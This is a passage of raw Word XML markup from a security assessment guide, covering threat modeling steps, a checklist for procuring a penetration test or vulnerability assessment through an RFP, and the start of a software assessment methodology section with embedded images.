          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>undesirable event that may be malicious (such as DoS atta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ck) or incidental (failure of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Storage Device). Threat modeling is a planned activit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">y for identifying and assessing </w:t>
      </w:r>
      <w:r w:rsidRPr="00593903">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application threats and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRDefault="007177C7" w:rsidP="00593903">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Scope – </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Identifying tangible asset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s like databases of information </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or sensitive files is usually easy. Understanding t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he capabilities provided by the </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application and valuing them is more difficul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">t. Less concrete things such as </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reputation and goodwill are the most difficult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to measure, but they are often </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the most critical.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify Threat Agents and Possible Attacks – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A key part of the threat </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>model is a characterization of the different gro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ups of people who might be able </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to attack an application. These groups should i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nclude insiders and outsiders, </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>performing both inadvertent mistakes and malicious attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Understand Existing Countermeasures – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The model must include any and </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all existing countermeasures already deployed within the enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify Exploitable Vulnerabilities – </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once you have an understanding of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the security in the application, you can then analyze for new vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The focus needs to be on vulnerabilities that co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nnect the possible attacks that </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>you have identified to the negative consequences that you have identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRPr="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Prioritized Identified Risks – </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prioritization i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s everything in threat modeling </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>because there are always lots of risks that simply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not rate any attention. For </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>each threat, you estimate a number of l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ikelihood and impact factors to </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>determine an overall risk or severity level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007177C7" w:rsidRDefault="007177C7" w:rsidP="007177C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify Countermeasures to Reduce Threat – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The last step is to identify </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>countermeasures to reduce the risk to accep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">table levels, based on the risk </w:t>
      </w:r>
      <w:r w:rsidRPr="007177C7">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>appetite of the enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00852A8C" w:rsidRPr="00593903" w:rsidRDefault="00852A8C" w:rsidP="00593903">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="00267383" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:t xml:space="preserve">Security Assessment Procumbent – RFP (Request For Proposal) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Ensure the Scope is Clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>External or Internal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Number of IPs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Are Web Applications in Spec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Assessment or Penetration Test </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Is Exploitation in Scope, Is Pivoting in Scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Information to provide</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Request Named Resources (CVs, References)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E59E8" w:rsidRPr="001E59E8" w:rsidRDefault="001E59E8" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Request a description of the methodology </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF32E3" w:rsidRDefault="001E59E8" w:rsidP="00BF32E3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E59E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Request a sample report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF32E3" w:rsidRDefault="00BF32E3" w:rsidP="00BF32E3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF32E3" w:rsidRDefault="00BF32E3" w:rsidP="00BF32E3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C5B9F" w:rsidRDefault="003C5B9F" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003C5B9F">
        <w:t>Software Assessment methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5B9F" w:rsidRDefault="003C5B9F" w:rsidP="003C5B9F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C5B9F" w:rsidRDefault="003C5B9F" w:rsidP="003C5B9F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55BCAAC7" wp14:editId="4B4B7179">
            <wp:extent cx="5943600" cy="3002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02280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5B9F" w:rsidRPr="003C5B9F" w:rsidRDefault="003C5B9F" w:rsidP="003C5B9F">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA9AFFB" wp14:editId="75B1B21F">
            <wp:extent cx="5943600" cy="36569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56965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5B9F" w:rsidRDefault="003C5B9F" w:rsidP="00BF32E3">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D106F0" w:rsidRDefault="00D106F0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D106F0" w:rsidRDefault="00D106F0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D4D6C" w:rsidRDefault="009D4D6C" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000300B0" w:rsidRDefault="000300B0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000300B0" w:rsidRDefault="000300B0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000300B0" w:rsidRDefault="000300B0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E83969" w:rsidRDefault="00E83969" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E83969" w:rsidRDefault="00E83969" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000300B0" w:rsidRPr="001E59E8" w:rsidRDefault="000300B0" w:rsidP="001E59E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="005F6612" w:rsidP="00413D22">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9ED65D" wp14:editId="72AE2C1C">
